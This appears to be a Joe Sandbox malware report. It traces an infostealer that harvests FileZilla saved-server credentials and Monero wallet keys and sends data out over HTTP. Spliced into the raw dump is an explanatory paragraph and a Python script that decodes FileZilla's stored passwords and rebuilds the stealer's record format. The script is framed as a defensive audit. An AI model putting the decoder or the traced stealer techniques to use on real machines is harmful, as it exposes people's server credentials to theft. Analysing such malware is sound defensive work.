                                        • Instruction Fuzzy Hash: 0A514BF3A183044FF7006A2DEC857A676D5EB54320F69463CEAD8C7380F9BD98068693
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ea00269c5b9583283c948dfd86fc1e4553f206633d128925dd5a3cfbc4a7945b
                                        • Instruction ID: 65b79ca3e7156ea083fc44a85a7ce5e68c50ac6b50d8b9f2ab3438223b439d93
                                        • Opcode Fuzzy Hash: ea00269c5b9583283c948dfd86fc1e4553f206633d128925dd5a3cfbc4a7945b
                                        • Instruction Fuzzy Hash: A85216F3608200AFE3146E2DEC8577AFBE5EF94320F1A893DE6C583744E63598458693
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8701d047ba8f6f065cd5fc430e4c767f014fb1cf1b926ce90c9c5eeaba2e1037
                                        • Instruction ID: 615f3dc8f20e63acc961a843b6fe9c683c5a479c6d8d4190e6eee2b8dbc4e0ac
                                        • Opcode Fuzzy Hash: 8701d047ba8f6f065cd5fc430e4c767f014fb1cf1b926ce90c9c5eeaba2e1037
                                        • Instruction Fuzzy Hash: 32A148F3A082009FE718AE1CEC8576AB7E5EF98310F19453DDAC5D3784E6359815CB86
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 22efc3daf551621ad159f9c1708e590a3a519aa6432594b325b172b68c5f9a25
                                        • Instruction ID: 90c27fd157c381dbba632d6e4c635fc4328741820fbc506508e547b714085b0d
                                        • Opcode Fuzzy Hash: 22efc3daf551621ad159f9c1708e590a3a519aa6432594b325b172b68c5f9a25
                                        • Instruction Fuzzy Hash: 85514AF3A092049FD358AE2DEC4577AB7D7EBD8320F1A852DE38583788FD3558058686
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fb8539e3deeb8f809241483ce718149ffa8ac2f5585c34d4e6814eb94be1764e
                                        • Instruction ID: 690efe464eff9d80923d9d2593dd3d263c70fae42354a84f208297f3ecc125d4
                                        • Opcode Fuzzy Hash: fb8539e3deeb8f809241483ce718149ffa8ac2f5585c34d4e6814eb94be1764e
                                        • Instruction Fuzzy Hash: 2641C2F290D608DBE304AE99DC4463EBBE9EB94610F46C92DEAC687300E5325851C7D7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a6cf57101eb416f8f4b34b0fd45b502c4e89b0ccfa5f73a9aa71f2151f90e058
                                        • Instruction ID: 233b853540a353dd7539116964897c7e3cf7d587461f97c4fd8317ecea89ce52
                                        • Opcode Fuzzy Hash: a6cf57101eb416f8f4b34b0fd45b502c4e89b0ccfa5f73a9aa71f2151f90e058
                                        • Instruction Fuzzy Hash: FB3107F3A0431C8BF714AD39DC95762B6879BD0320F2B463D9B48977C4FC3AA8054289
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fa9d85cf5d2002df337c2791f60b8d99b4f93c2f883e71765f87f5eddce0253f
                                        • Instruction ID: 6d31a59648e90cbd5964c437929e2536737140e9c3618e09f23033f5422c66c1
                                        • Opcode Fuzzy Hash: fa9d85cf5d2002df337c2791f60b8d99b4f93c2f883e71765f87f5eddce0253f
                                        • Instruction Fuzzy Hash: 5F214BF291C704AFD701AF69DC8267AF7E8EF58660F16482DEAD4C3640E77198408B93
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CB8E0B
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                          • Part of subcall function 00CA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CA99EC
                                          • Part of subcall function 00CA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CA9A11
                                          • Part of subcall function 00CA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00CA9A31
                                          • Part of subcall function 00CA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00CA148F,00000000), ref: 00CA9A5A
                                          • Part of subcall function 00CA99C0: LocalFree.KERNEL32(00CA148F), ref: 00CA9A90
                                          • Part of subcall function 00CA99C0: CloseHandle.KERNEL32(000000FF), ref: 00CA9A9A
                                          • Part of subcall function 00CB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CB8E52
                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00CC0DBA,00CC0DB7,00CC0DB6,00CC0DB3), ref: 00CB0362
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB0369
                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00CB0385
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CC0DB2), ref: 00CB0393
                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 00CB03CF
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CC0DB2), ref: 00CB03DD
                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00CB0419
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CC0DB2), ref: 00CB0427
                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00CB0463
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CC0DB2), ref: 00CB0475
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CC0DB2), ref: 00CB0502
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CC0DB2), ref: 00CB051A
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CC0DB2), ref: 00CB0532
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CC0DB2), ref: 00CB054A
                                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00CB0562
                                        • lstrcat.KERNEL32(?,profile: null), ref: 00CB0571
                                        • lstrcat.KERNEL32(?,url: ), ref: 00CB0580
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CB0593
                                        • lstrcat.KERNEL32(?,00CC1678), ref: 00CB05A2
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CB05B5
                                        • lstrcat.KERNEL32(?,00CC167C), ref: 00CB05C4
                                        • lstrcat.KERNEL32(?,login: ), ref: 00CB05D3
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CB05E6
                                        • lstrcat.KERNEL32(?,00CC1688), ref: 00CB05F5
                                        • lstrcat.KERNEL32(?,password: ), ref: 00CB0604
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CB0617
                                        • lstrcat.KERNEL32(?,00CC1698), ref: 00CB0626
                                        • lstrcat.KERNEL32(?,00CC169C), ref: 00CB0635
                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CC0DB2), ref: 00CB068E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                        • API String ID: 1942843190-555421843
                                        • Opcode ID: 20c573cca18af120348822e71a7dc7fee7fb46fd8242a493bbff1865baeea347
                                        • Instruction ID: ab5d579a14a59d6746876937a6107da3e33ce238b636be5d4bd37b83ba60958b
                                        • Opcode Fuzzy Hash: 20c573cca18af120348822e71a7dc7fee7fb46fd8242a493bbff1865baeea347
                                        • Instruction Fuzzy Hash: 2ED12F71900208AFCB04EBF5DD9AEEE7778EF54300F544428F542BA091DF75AA4AEB61
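The API and string IDs above describe a credential harvester for FileZilla: it resolves the profile directory with SHGetFolderPathA, reads \AppData\Roaming\FileZilla\recentservers.xml into a LocalAlloc buffer, locates the <Host>, <Port>, <User> and <Pass encoding="base64"> tags with StrStrA rather than an XML parser, and lstrcat's the result into a "browser: FileZilla / profile: null / url: / login: / password:" record. FileZilla saves passwords in that file only base64-encoded, so anything the stealer finds there is effectively plaintext. The script below is an added example, not code from the report or from the malware: it parses a constructed recentservers.xml the way the stealer's string search does (properly, with an XML parser), rebuilds the record layout so the format can be recognised in recovered exfiltration data, and offers an audit view that tells a defender which saved hosts carry a stored password. The separator strings the report references only by address (00CC1678 and friends) are assumed to be ":" and newlines.

```python
import base64
import xml.etree.ElementTree as ET
from typing import List, Optional

# Constructed sample in the layout FileZilla writes to recentservers.xml.
# The first server has a stored (base64) password; the second uses an
# interactive logon type and therefore has no <Pass> element at all.
SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.1" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Type>0</Type>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <Type>0</Type>
      <User>backup</User>
      <Logontype>3</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def _decode_pass(pass_el: Optional[ET.Element]) -> Optional[str]:
    """Return the stored password, or None when the entry stores none."""
    if pass_el is None or not pass_el.text:
        return None
    if pass_el.get("encoding") == "base64":
        # base64 is an encoding, not encryption: anyone with the file has the secret
        return base64.b64decode(pass_el.text).decode("utf-8", "replace")
    return pass_el.text  # older FileZilla versions wrote the value unencoded


def extract_servers(xml_text: str) -> List[dict]:
    """The four fields the stealer's StrStrA calls look for, per <Server>."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    servers = []
    for srv in root.iter("Server"):
        servers.append({
            "host": srv.findtext("Host", default=""),
            "port": srv.findtext("Port", default=""),
            "user": srv.findtext("User", default=""),
            "password": _decode_pass(srv.find("Pass")),
        })
    return servers


def format_stealc_record(entry: dict) -> str:
    """Rebuild the record the lstrcat sequence assembles.

    The literal pieces come from the report's String ID line; the separators
    between host/port and after each value are referenced only by address
    there, so ":" and "\\n" are assumptions of this example.
    """
    return "".join([
        "browser: FileZilla\n",
        "profile: null\n",
        f"url: {entry['host']}:{entry['port']}\n",
        f"login: {entry['user']}\n",
        f"password: {entry['password'] or ''}\n",
    ])


def audit(xml_text: str) -> List[tuple]:
    """Defender's view: (host, has_stored_password) for every saved server."""
    return [(e["host"], e["password"] is not None) for e in extract_servers(xml_text)]


if __name__ == "__main__":
    for entry in extract_servers(SAMPLE_RECENTSERVERS):
        print(format_stealc_record(entry))
    print(audit(SAMPLE_RECENTSERVERS))
```

Run `audit()` against a real `%APPDATA%\FileZilla\recentservers.xml` (and `sitemanager.xml`, which uses the same element names) to see what a stealer would get from a host; the mitigation is FileZilla's master-password option or not saving passwords at all.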
                                        APIs
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                          • Part of subcall function 00CA47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CA4839
                                          • Part of subcall function 00CA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CA4849
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00CA59F8
                                        • StrCmpCA.SHLWAPI(?,009DF1A0), ref: 00CA5A13
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CA5B93
                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,009DF2F0,00000000,?,009DE618,00000000,?,00CC1A1C), ref: 00CA5E71
                                        • lstrlen.KERNEL32(00000000), ref: 00CA5E82
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00CA5E93
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CA5E9A
                                        • lstrlen.KERNEL32(00000000), ref: 00CA5EAF
                                        • lstrlen.KERNEL32(00000000), ref: 00CA5ED8
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00CA5EF1
                                        • lstrlen.KERNEL32(00000000,?,?), ref: 00CA5F1B
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00CA5F2F
                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00CA5F4C
                                        • InternetCloseHandle.WININET(00000000), ref: 00CA5FB0
                                        • InternetCloseHandle.WININET(00000000), ref: 00CA5FBD
                                        • HttpOpenRequestA.WININET(00000000,009DF250,?,009DE910,00000000,00000000,00400100,00000000), ref: 00CA5BF8
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                        • InternetCloseHandle.WININET(00000000), ref: 00CA5FC7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
